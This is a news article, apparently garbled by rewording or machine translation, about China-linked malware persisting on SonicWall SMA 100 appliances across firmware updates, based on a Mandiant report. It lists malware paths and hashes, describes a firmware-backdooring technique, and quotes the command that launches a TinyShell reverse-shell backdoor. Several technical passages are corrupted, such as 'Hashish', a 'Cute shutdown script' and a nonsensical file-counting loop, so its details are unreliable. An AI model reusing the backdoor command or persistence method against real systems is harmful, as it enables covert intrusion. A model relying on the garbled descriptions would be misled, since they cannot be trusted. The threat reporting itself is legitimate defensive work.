Threat actors linked to the Chinese government are infecting a widely used security device from SonicWall with malware that remains active even after the device receives firmware updates, researchers said.
SonicWall’s Secure Mobile Access 100 is a secure remote access device that helps organizations securely deploy a remote workforce. Customers use it to grant granular access controls to remote users, provide VPN connections to organizational networks, and define unique profiles for each employee. The access the SMA 100 has to customer networks makes it an attractive target for threat actors.
In 2021, the device was attacked by sophisticated hackers who exploited what was then a zero-day vulnerability. Security appliances from Fortinet and Pulse Secure have come under similar attacks in recent years.
Gaining long-term persistence in networks
On Thursday, security firm Mandiant released a report that said threat actors with suspected ties to China engaged in a campaign to maintain long-term persistence by running malware on unpatched SonicWall SMA appliances. The campaign was notable for the malware’s ability to remain on devices even after downloading new firmware.
“Attackers put significant effort into the stability and persistence of their tools,” wrote Mandiant researchers Daniel Lee, Stephen Eckels and Ben Read. “This allows their access to the network to continue through firmware updates and maintain a position on the network through the SonicWall appliance.”
To achieve this persistence, the malware checks for available firmware updates every 10 seconds. When an update is available, the malware copies the archived backup file, unzips it, attaches it, and then copies the entire malware package into it. The malware also adds a user root backdoor to the attached file. The malware then recompresses the file so that it is ready for installation.
“The technique is not particularly sophisticated, but shows considerable effort on the attacker’s part to understand the device’s update cycle, then develop and test a method for persistence,” the researchers wrote.
The persistence techniques are consistent with a 2021 attack campaign that used 16 malware families to infect Pulse Secure devices. Mandiant attributed the attacks to multiple threat groups, including those tracked as UNC2630, UNC2717, which the company said support “key priorities of the Chinese government.” Mandiant attributed the ongoing attacks against SonicWall SMA 100 clients to a group monitored as UNC4540.
“Over the past few years Chinese attackers have developed multiple exploits and zero-day malware for a variety of networked devices that face the Internet as an avenue for full enterprise intrusion, and the example reported here is part of a recent pattern that Mandiant expects to continue in the short term,” Mandiant researchers wrote in Thursday’s report.
Extremely privileged access
The main purpose of the malware appears to be to steal cryptographically hashed passwords for all logged in users. It also provides a web shell that the threat actor can use to install new malware.
“Analysis of a compromised device revealed a collection of files that provide the attacker with highly privileged and available access to the device,” the researchers wrote in Thursday’s report. “The malware consists of a series of bash scripts and a single ELF binary identified as a TinyShell variant. The overall behavior of the bash suite shows a detailed understanding of the device and is well-tuned to the system to provide stability and persistence.”
The list of malware is:
Path | Hashish | Mode |
/bin/firewalld | e4117b17e3d14fe64f45750be71dbaa6 | Malware main process |
/bin/httpsd | 2d57bcb8351cf2b57c4fd2d1bb8f862e | TinyShell back door |
/etc/rc.d/rc.local | 559b9ae2a578e1258e80c45a5794c071 | Startup persistence for firewall |
/bin/iptabled | 8dbf1effa7bc94fc0b9b4ce83dfce2e6 | Unnecessary malware main process |
/bin/geoBotnetd | 619769d3d40a3c28ec83832ca521f521 | Firmware backdoor script |
/bin/ifconfig6 | fa1bf2e427b2defffd573854c35d4919 | Cute shutdown script |
The report continued:
The primary malware entry point is a bash script named
firewalld
which executes its main loop once to count each file in the system in the square: …for j in $(ls / -R) do for i in $(ls / -R) do:
… The script is responsible for executing a SQL statement to complete the credential theft and execute the other components.The first function in
firewalld
runs the TinyShell backdoorhttpsd
orderednohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 &
if thehttpsd
the process is not already running. This puts TinyShell into reverse shell mode, instructing it to call the aforementioned IP address and port at a specific time and day represented by-m
flag, with a beacon interval defined by-d
flag. The binary embeds a hardcoded IP address, which is used in reverse shell mode if the IP address argument is left blank. It also has a listening lock function available.
The researchers said they did not know who the original source of infection was.
Last week, SonicWall published an advisory urging SMA 100 users to upgrade to version 10.2.1.7 or later. These versions include improvements such as file integrity monitoring and abnormal process detection. The patch is available here. Users should also regularly review logs for signs of compromise, including abnormal connections or internal traffic.